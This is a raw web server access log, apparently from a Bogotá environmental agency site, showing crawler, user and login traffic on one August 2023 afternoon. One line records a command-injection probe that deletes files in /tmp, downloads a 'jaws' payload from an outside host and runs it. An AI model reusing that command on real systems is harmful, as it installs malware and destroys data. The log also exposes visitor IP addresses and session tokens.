172.22.2.4 - - [26/Aug/2023:14:47:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [26/Aug/2023:14:50:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:14:51:03 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
173.252.87.11 - - [26/Aug/2023:14:51:06 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
40.77.167.208 - - [26/Aug/2023:14:51:50 -0500] "GET /Publicaciones/2023EE90263.pdf HTTP/1.1" 404 227
216.245.221.92 - - [26/Aug/2023:14:52:16 -0500] "HEAD / HTTP/1.1" 200 -
191.95.174.180 - - [26/Aug/2023:14:52:55 -0500] "GET /secretaria-de-ambiente-abre-convocatoria-para-el-proceso-de-formacion-mujeres-cuidadoras-de-humedales.html HTTP/1.1" 304 -
172.22.2.4 - - [26/Aug/2023:14:52:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:14:53:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [26/Aug/2023:14:55:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
216.245.221.92 - - [26/Aug/2023:14:57:16 -0500] "HEAD / HTTP/1.1" 200 -
181.61.205.202 - - [26/Aug/2023:14:57:24 -0500] "GET /alianza-entre-secretaria-de-ambiente-y-universidad-piloto-para-capacitar-y-fortalecer-a-las-mujeres-que-reverdecen.html?fbclid=IwAR05FbC44_6UunD0ZusTIV6VT5W5dW8u7X0wFEp-rLC7naT6nLcgGnAsnTI HTTP/1.1" 200 950
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12172
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:38 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2221
186.80.52.212 - - [26/Aug/2023:14:58:38 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:42 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16330
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:43 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:51 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.80.52.212 - - [26/Aug/2023:14:58:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64949
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:58:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.80.52.212 - - [26/Aug/2023:14:58:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 7908
186.80.52.212 - - [26/Aug/2023:14:59:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 139742
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.212 - - [26/Aug/2023:14:59:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 300446
172.22.2.4 - - [26/Aug/2023:14:58:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [26/Aug/2023:15:00:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:14:59:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52656
206.0.24.50 - - [26/Aug/2023:15:01:09 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
206.0.24.50 - - [26/Aug/2023:15:01:09 -0500] "GET /favicon.ico HTTP/1.1" 404 1346
206.0.24.50 - - [26/Aug/2023:15:01:23 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
206.0.24.50 - - [26/Aug/2023:15:01:32 -0500] "GET / HTTP/1.1" 200 4720
206.0.24.50 - - [26/Aug/2023:15:01:32 -0500] "GET /js/url.js HTTP/1.1" 404 1294
206.0.24.50 - - [26/Aug/2023:15:01:32 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
206.0.24.50 - - [26/Aug/2023:15:01:32 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
206.0.24.50 - - [26/Aug/2023:15:01:32 -0500] "GET /css/style.css HTTP/1.1" 200 3473
186.28.76.64 - - [26/Aug/2023:15:01:54 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
186.28.76.64 - - [26/Aug/2023:15:01:55 -0500] "GET /favicon.ico HTTP/1.1" 404 1346
206.0.24.50 - - [26/Aug/2023:15:01:55 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
206.0.24.50 - - [26/Aug/2023:15:02:04 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
216.245.221.92 - - [26/Aug/2023:15:02:16 -0500] "HEAD / HTTP/1.1" 200 -
206.0.24.50 - - [26/Aug/2023:15:02:22 -0500] "GET / HTTP/1.1" 200 4720
206.0.24.50 - - [26/Aug/2023:15:02:22 -0500] "GET /js/url.js HTTP/1.1" 404 1294
186.28.76.64 - - [26/Aug/2023:15:02:27 -0500] "GET /secretaria-de-ambiente-abre-convocatoria-para-el-proceso-de-formacion-mujeres-cuidadoras-de-humedales.html HTTP/1.1" 200 943
172.22.2.4 - - [26/Aug/2023:15:02:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
206.0.24.50 - - [26/Aug/2023:15:03:30 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
111.202.101.118 - - [26/Aug/2023:15:04:22 -0500] "GET /BLA/resoluciones/AUTOS%202014/6543.pdf HTTP/1.1" 200 564619
186.28.76.64 - - [26/Aug/2023:15:04:46 -0500] "GET /inscribete-y-participa-en-la-convencion-internacional-de-emergencia-climatica-bogota-2023.html HTTP/1.1" 200 895
201.245.192.253 - - [26/Aug/2023:15:05:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:15:04:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.6 - - [26/Aug/2023:15:06:08 -0500] "GET /resoluciones/RESOLUCIONES%202010/2017.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [26/Aug/2023:15:04:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [26/Aug/2023:15:07:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.7 - - [26/Aug/2023:15:07:24 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/2a.pdf HTTP/1.1" 404 1018
66.249.70.6 - - [26/Aug/2023:15:07:26 -0500] "GET /BLA/resoluciones/AUTOS%202012/1055.pdf HTTP/1.1" 200 210353
66.249.70.5 - - [26/Aug/2023:15:08:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1031.pdf HTTP/1.1" 200 299816
39.98.174.240 - - [26/Aug/2023:15:08:21 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.70.5 - - [26/Aug/2023:15:08:30 -0500] "GET /BLA/resoluciones/AUTOS%202009/2551.pdf HTTP/1.1" 200 101256
186.28.76.64 - - [26/Aug/2023:15:09:25 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
201.245.192.253 - - [26/Aug/2023:15:10:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
172.22.2.4 - - [26/Aug/2023:15:09:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [26/Aug/2023:15:12:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:10:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
104.152.52.148 - - [26/Aug/2023:15:13:40 -0500] "GET / HTTP/1.0" 200 319
206.0.24.50 - - [26/Aug/2023:15:14:00 -0500] "GET /favicon.ico HTTP/1.1" 404 1346
192.133.77.14 - - [26/Aug/2023:15:14:29 -0500] "GET /robots.txt HTTP/1.1" 404 1034
192.133.77.14 - - [26/Aug/2023:15:14:29 -0500] "GET /images/Red%20de%20Monitoreo%20febrero%2025.png HTTP/1.1" 200 93489
66.249.70.7 - - [26/Aug/2023:15:15:04 -0500] "GET /BLA/resoluciones/AUTOS%202010/4857.pdf HTTP/1.1" 200 252135
201.245.192.253 - - [26/Aug/2023:15:15:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
161.10.221.23 - - [26/Aug/2023:15:15:16 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
161.10.221.23 - - [26/Aug/2023:15:15:16 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
161.10.221.23 - - [26/Aug/2023:15:15:16 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
161.10.221.23 - - [26/Aug/2023:15:15:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
161.10.221.23 - - [26/Aug/2023:15:15:18 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
161.10.221.23 - - [26/Aug/2023:15:15:18 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 95258
161.10.221.23 - - [26/Aug/2023:15:15:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 28859
40.77.167.29 - - [26/Aug/2023:15:16:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3807.pdf HTTP/1.1" 200 426113
216.245.221.92 - - [26/Aug/2023:15:17:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:15:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:16:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
201.245.192.253 - - [26/Aug/2023:15:18:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43020
201.245.192.253 - - [26/Aug/2023:15:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43801
54.39.104.60 - - [26/Aug/2023:15:20:06 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [26/Aug/2023:15:20:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
66.249.70.6 - - [26/Aug/2023:15:20:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4086.pdf HTTP/1.1" 200 895524
172.22.2.4 - - [26/Aug/2023:15:20:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [26/Aug/2023:15:22:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.5 - - [26/Aug/2023:15:23:00 -0500] "GET /sig/Manual%20de%20Procesos%20y%20Procedimientos/PM04%20Evaluaci%C3%B3n,%20Control%20y%20Seguimiento/126PM04-PR17%20Atenci%C3%B3n%20solicitud%20Salvoconducto%20Flora.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [26/Aug/2023:15:21:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [26/Aug/2023:15:22:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53013
216.244.66.246 - - [26/Aug/2023:15:24:25 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.70.5 - - [26/Aug/2023:15:24:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5977.pdf HTTP/1.1" 200 289299
66.249.70.5 - - [26/Aug/2023:15:24:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7345.pdf HTTP/1.1" 200 371078
201.245.192.253 - - [26/Aug/2023:15:25:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
66.249.70.5 - - [26/Aug/2023:15:25:18 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202016/01144.pdf HTTP/1.1" 200 464495
216.245.221.92 - - [26/Aug/2023:15:27:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.5 - - [26/Aug/2023:15:27:30 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/55_artic/xtras/13.pdf HTTP/1.1" 404 1018
66.249.70.7 - - [26/Aug/2023:15:28:07 -0500] "GET /webfile/normas/ley%20527.pdf HTTP/1.1" 404 1100
206.0.24.50 - - [26/Aug/2023:15:28:10 -0500] "GET /secretaria-de-ambiente-abr HTTP/1.1" 404 1136
206.0.24.50 - - [26/Aug/2023:15:28:20 -0500] "GET / HTTP/1.1" 200 4720
206.0.24.50 - - [26/Aug/2023:15:28:21 -0500] "GET /js/url.js HTTP/1.1" 404 1294
66.249.70.5 - - [26/Aug/2023:15:28:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9804.pdf HTTP/1.1" 200 550225
206.0.24.50 - - [26/Aug/2023:15:28:52 -0500] "GET / HTTP/1.1" 200 4720
206.0.24.50 - - [26/Aug/2023:15:28:52 -0500] "GET /js/url.js HTTP/1.1" 404 1294
201.245.192.253 - - [26/Aug/2023:15:28:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43020
201.245.192.253 - - [26/Aug/2023:15:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43801
172.22.2.4 - - [26/Aug/2023:15:27:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.191.77 - - [26/Aug/2023:15:29:24 -0500] "GET /secretaria-de-ambiente-abre-convocatoria-para-el-proceso-de-formacion-mujeres-cuidadoras-de-humedales.html HTTP/1.1" 200 943
66.249.70.7 - - [26/Aug/2023:15:29:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3227.pdf HTTP/1.1" 200 83849
172.22.2.4 - - [26/Aug/2023:15:28:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54597
201.245.192.253 - - [26/Aug/2023:15:30:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41818
94.23.203.86 - - [26/Aug/2023:15:30:24 -0500] "GET /robots.txt HTTP/1.1" 404 1034
94.23.203.86 - - [26/Aug/2023:15:30:26 -0500] "GET /mejora-tu-bienestar-con-las-caminatas-ecologicas-%C3%82%C2%A1conoce-la-programacion-de-agosto.html HTTP/1.1" 200 873
66.249.70.6 - - [26/Aug/2023:15:30:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2709.pdf HTTP/1.1" 200 295200
114.94.12.9 - - [26/Aug/2023:15:31:09 -0500] "GET /galeria/galeria/fotos/Capellania4P.jpg HTTP/1.1" 200 37377
216.245.221.92 - - [26/Aug/2023:15:32:16 -0500] "HEAD / HTTP/1.1" 200 -
181.50.69.74 - - [26/Aug/2023:15:33:15 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/YT084JXQ+A3+L/oactHGmpEAVcmJEluSogQYkzlf95RR54QxWnAxm&y=U2FsdGVkX1+nxzSsBTAcYHEUe3zKtenhP6Bq4Ug+vf4Vwn0HFj39xWMtmbduGPP5 HTTP/1.1" 200 30
181.50.69.74 - - [26/Aug/2023:15:33:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19jhfNNed64ZfUEBgxkOYu/q5fxtqe1NeLCyjqWbrk3iogZQXhvPv6Y1rz9LXbEHZDxKEraYqgdJBsHlB/BHRSXMLl+WfFqE0k=&u=U2FsdGVkX19btFvHsGe+hzTnPSunpT6TU1V9sRuo+dcaZIUT672V60enXB/X1vur&y=U2FsdGVkX1+nxzSsBTAcYHEUe3zKtenhP6Bq4Ug+vf4Vwn0HFj39xWMtmbduGPP5 HTTP/1.1" 200 97
181.50.69.74 - - [26/Aug/2023:15:33:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/QM5QSXksT5qgRx5vn2PAzpO2VCOZYOUJPewQz/fpDak1zPT074SEPBEZznTSsVHeSa+r928pkpjfPTGbjviu1uLwRTTm3UUSd1HUJGqGLHGO3nYRD6YPACEgKfWYGQ19FKmU/VIi5ZlHa7U87hQdr8D1haPsqUVpwCjFy+Ij3rZab0T65pCvPTZuVgv84eg250cRHCFNWfIM4jCbCLYV10ziGIo5UBL2nhOTWcJoYIGr6Svmfk9I+839h/9zTrVbvOUXhondWniH6DqVXiJiyXOWSr/AaflCGGvYu3z+mySDg3Zz4zwxnMUB527pooWwpMW9z8IzQjAmza/kul8Gf7qh9RGJk6wLuCI9+CntVr7aZUHiEapTaAv2RIEaO3vc/luwqMEFwqMfyJo5RQPPXYX2EiKLOGQU85AZMf9smt6RD87xqcrcFh2D6/VBWrBS0DCrZQiw8p3qz/8t1YoH9sDNBSi9Hk0vnvi9Ft6wXFEQWmoGlcJNdVaGR9VEUU2VeBab1PDap/Mn5Lu/YYgEghWM3xkmGNP+O448iZI34z/Mciijxw7JQw1FcdDPYtU0jd2IMoncE/8y6eMDwVKhQBYC8YUaCHKRIueKkwkzgBEmIRLvyCZTdpAb5S/aSwVKjoCsFMz3UGW1ndgPNQsOJRnjl5PbGT78n6B9STeoK0ysh8onEB6JQ+tQ+jywiQoeFDpMF62SkANUAOQ0xn7zAgTGQwk9IsMyPBquNjkYc9DoRvtyipwILTEmKmlNggxF6sJbyNGd+6ATtaCLNdBu9OSIvbQHilDpOkDXU/MATlqCp/+fe/mzOk4y5ItBBTTLgQloydaWH+yC4KxNWi/7xirVeNlrGkYL+/ZdXyMlAxDD2dzEmOiUVH3ZTQ0D3iYLtknlXovztS4wGZ7g+cjr1i2ZvUSteG6FOnX6xvR4RfggEJN/tE4uykKlFByrzfEyuu4E0gYsa0Z1wT1pacebL7oAOiXSXm+xNQdfmIkpVMzkFyFLpsPKCZn8romVAX+Wp6NormASTk9ke2Lg9v1viWHoBPd4KdJNKYOQ9bAxk7a1HZwCHUoKKEpbmnm21aBLhOpoC1AjUiwHfoIwmDh/ug2hHpycrI9MTF4IQmi4bCCeFcULGqtXYnsuWUxa61pwzlV0NFY57Pb2SuW2lTnXjWBXHgSxx/pIQfzuZ6fK9M8WD7G8Kl+FmDK9Kk/0BFX3SVxIaKjugDcuyjmtbzri/fiKP/TV0uSw2VXtAAr+giolqlZm9GaOaySVRcO9zI7bqrFeemjwxM5EsYDdIDNLwGjefhxhTqTkczkzjZThnLBZaCX4ypKPRY4I2yPIxW0VO2//MjQEbKPQQttR7pZZK1rtZrkgawjSX6RqcgAfgbE+8s6Y+qyIxUpndRcWkOe7+zF59suRgD0rcZYCzEgIDTe9C6NKOA/s=&u=U2FsdGVkX19btFvHsGe+hzTnPSunpT6TU1V9sRuo+dcaZIUT672V60enXB/X1vur&y=U2FsdGVkX1+nxzSsBTAcYHEUe3zKtenhP6Bq4Ug+vf4Vwn0HFj39xWMtmbduGPP5 HTTP/1.1" 200 3285
181.50.69.74 - - [26/Aug/2023:15:33:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/jdB5tlF7gD4Nd0Aj+hxpxWNsMIbOJR35AzdDzU9url1Ii0XSZPlMMeMIxtC7G4t+u8b/RpZ4RIabnsQ0VgcPO6xbOMS7pN9c0EhVBkljOkIlKkARkHF+dldLnCUrg8DoQ8KZdZehygzwyGj4xbCQl5fkKlpWYpiPuPn2ebycfxUTC7Nw9Lp36HRtEsdLFxTKGRLDTu6JYMNcmy5NoPz0gS/YIDbPosziSJu6bXaP6d+JxX0A+m6jqR+KNfYW07+SOb7F4fOfSve9g6csRSSCEgvOv1VsD/C1+dDGtjIxJ5ggyk/wGFGKmTgHlgx763/qP+hZly6YZLtg+i0gZbPE9z9M4Utfd2QI=&u=U2FsdGVkX19btFvHsGe+hzTnPSunpT6TU1V9sRuo+dcaZIUT672V60enXB/X1vur&y=U2FsdGVkX1+nxzSsBTAcYHEUe3zKtenhP6Bq4Ug+vf4Vwn0HFj39xWMtmbduGPP5 HTTP/1.1" 200 196
181.50.69.74 - - [26/Aug/2023:15:33:16 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/YT084JXQ+A3+L/oactHGmpEAVcmJEluSogQYkzlf95RR54QxWnAxm HTTP/1.1" 200 31032
